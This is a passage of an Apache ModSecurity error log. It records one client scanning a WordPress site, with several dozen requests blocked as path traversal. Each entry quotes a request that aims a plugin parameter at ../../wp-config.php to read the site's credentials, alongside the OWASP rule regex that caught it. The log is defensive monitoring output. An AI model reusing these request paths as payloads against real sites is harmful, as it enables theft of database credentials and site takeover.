/wp-content/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive/Predicate.php"] [unique_id "YtscX-CtYZwatdwcM8WqwwAAAEM"] [Fri Jul 22 16:53:35.636200 2022] [:error] [pid 22472:tid 140016965560064] [client 72.11.157.116:51346] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive/Reader.php"] [unique_id "YtscXypbG8_UBGXeM63wsAAAAJU"] [Fri Jul 22 16:53:35.740207 2022] [:error] [pid 22471:tid 140017091450624] [client 72.11.157.116:51348] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/BackUp/Archive/Writer.php"] [unique_id "YtscX-CtYZwatdwcM8WqxAAAAEY"] [Fri Jul 22 16:53:35.843972 2022] [:error] [pid 23081:tid 140017024308992] [client 72.11.157.116:51352] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/Enigma2.php?boarddir=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/Enigma2.php"] [unique_id "YtscX3hurfgLch3PImzH5QAAAM4"] [Fri Jul 22 16:53:35.940796 2022] [:error] [pid 23081:tid 140017074665216] [client 72.11.157.116:51354] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/abtest/abtest_admin.php?action=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/abtest/abtest_admin.php"] [unique_id "YtscX3hurfgLch3PImzH5gAAAMg"] [Fri Jul 22 16:53:36.032247 2022] [:error] [pid 23081:tid 140016999130880] [client 72.11.157.116:51356] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-custom-fields/core/actions/export.php?acf_abspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-custom-fields/core/actions/export.php"] [unique_id "YtscYHhurfgLch3PImzH5wAAANE"] [Fri Jul 22 16:53:36.122993 2022] [:error] [pid 22471:tid 140017108236032] [client 72.11.157.116:51358] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "YtscYOCtYZwatdwcM8WqxQAAAEQ"] [Fri Jul 22 16:53:36.229749 2022] [:error] [pid 23081:tid 140017108236032] [client 72.11.157.116:51360] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php"] [unique_id "YtscYHhurfgLch3PImzH6AAAAMQ"] [Fri Jul 22 16:53:36.349905 2022] [:error] [pid 23081:tid 140017116628736] [client 72.11.157.116:51362] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php?abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php"] [unique_id "YtscYHhurfgLch3PImzH6QAAAMM"] [Fri Jul 22 16:53:36.440763 2022] [:error] [pid 23081:tid 140016973952768] [client 72.11.157.116:51364] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php?abspath=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php"] [unique_id "YtscYHhurfgLch3PImzH6gAAANQ"] [Fri Jul 22 16:53:36.537977 2022] [:error] [pid 23081:tid 140016957167360] [client 72.11.157.116:51366] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/apptha-slider-gallery/asgallDownload.php?imgname=..%2F..%2F..%2Fwp-load.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/apptha-slider-gallery/asgallDownload.php"] [unique_id "YtscYHhurfgLch3PImzH6wAAANY"] [Fri Jul 22 16:53:36.628518 2022] [:error] [pid 23081:tid 140017099843328] [client 72.11.157.116:51368] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "YtscYHhurfgLch3PImzH7AAAAMU"] [Fri Jul 22 16:53:36.718813 2022] [:error] [pid 22470:tid 140016940381952] [client 72.11.157.116:51370] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "YtscYHxqqtgWgIAXsGFhZgAAABg"] [Fri Jul 22 16:53:36.811797 2022] [:error] [pid 23081:tid 140016990738176] [client 72.11.157.116:51372] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/bookx/includes/bookx_export.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/bookx/includes/bookx_export.php"] [unique_id "YtscYHhurfgLch3PImzH7QAAANI"] [Fri Jul 22 16:53:36.909684 2022] [:error] [pid 23081:tid 140016965560064] [client 72.11.157.116:51374] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/brandfolder/callback.php?wp_abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "YtscYHhurfgLch3PImzH7gAAANU"] [Fri Jul 22 16:53:37.015359 2022] [:error] [pid 23081:tid 140017091450624] [client 72.11.157.116:51376] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "YtscYXhurfgLch3PImzH7wAAAMY"] [Fri Jul 22 16:53:37.112791 2022] [:error] [pid 23081:tid 140017057879808] [client 72.11.157.116:51378] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php"] [unique_id "YtscYXhurfgLch3PImzH8AAAAMo"] [Fri Jul 22 16:53:37.203443 2022] [:error] [pid 22471:tid 140017074665216] [client 72.11.157.116:51380] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php"] [unique_id "YtscYeCtYZwatdwcM8WqxgAAAEg"] [Fri Jul 22 16:53:37.294044 2022] [:error] [pid 22472:tid 140016999130880] [client 72.11.157.116:51382] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "YtscYSpbG8_UBGXeM63wsQAAAJE"] [Fri Jul 22 16:53:37.385078 2022] [:error] [pid 22471:tid 140017066272512] [client 72.11.157.116:51384] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/disclosure-policy-plugin/functions/action.php?delete=asdf&blogUrl=asdf&abspath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/disclosure-policy-plugin/functions/action.php"] [unique_id "YtscYeCtYZwatdwcM8WqxwAAAEk"] [Fri Jul 22 16:53:37.488400 2022] [:error] [pid 22470:tid 140016957167360] [client 72.11.157.116:51386] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=..%2F..%2F..%2Fwp-config.php&currdir=%2Fwp-content%2Fplugins%2Fdm-albums%2F"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dm-albums/dm-albums.php"] [unique_id "YtscYXxqqtgWgIAXsGFhZwAAABY"] [Fri Jul 22 16:53:37.579364 2022] [:error] [pid 23081:tid 140017133414144] [client 72.11.157.116:51388] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dm-albums/template/album.php"] [unique_id "YtscYXhurfgLch3PImzH8QAAAME"] [Fri Jul 22 16:53:37.670189 2022] [:error] [pid 23081:tid 140017015916288] [client 72.11.157.116:51390] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: 